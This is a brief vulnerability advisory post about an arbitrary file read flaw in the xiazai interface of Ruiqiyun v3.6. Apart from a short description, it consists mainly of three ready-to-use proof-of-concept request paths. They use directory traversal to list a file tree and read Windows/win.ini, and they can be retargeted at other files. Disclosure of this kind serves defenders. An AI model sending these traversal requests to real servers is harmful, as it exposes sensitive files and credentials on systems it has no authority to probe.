Ruiqiyunxiazai Arbitrary File Reading Vulnerability
Ruiqiyunxiazai Arbitrary File Reading Vulnerability
Ruiqiyunxiazai arbitrary file reading vulnerability
Vulnerability Description
There is a vulnerability to read any file in the xiazai interface. The attacker can obtain sensitive files in the server through the vulnerability.
Vulnerability Impact
Ruiqiyun v3.6
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
/dwr/hret/fileTree?filePath=../
/dwr/srecy/xiazai?filePath=../../../../../../../../../../../Windows/win.ini
/dwr/hret/downfile?fpid=../../../../../../../../../Windows/win.ini
This post is licensed under CC BY 4.0 by the author.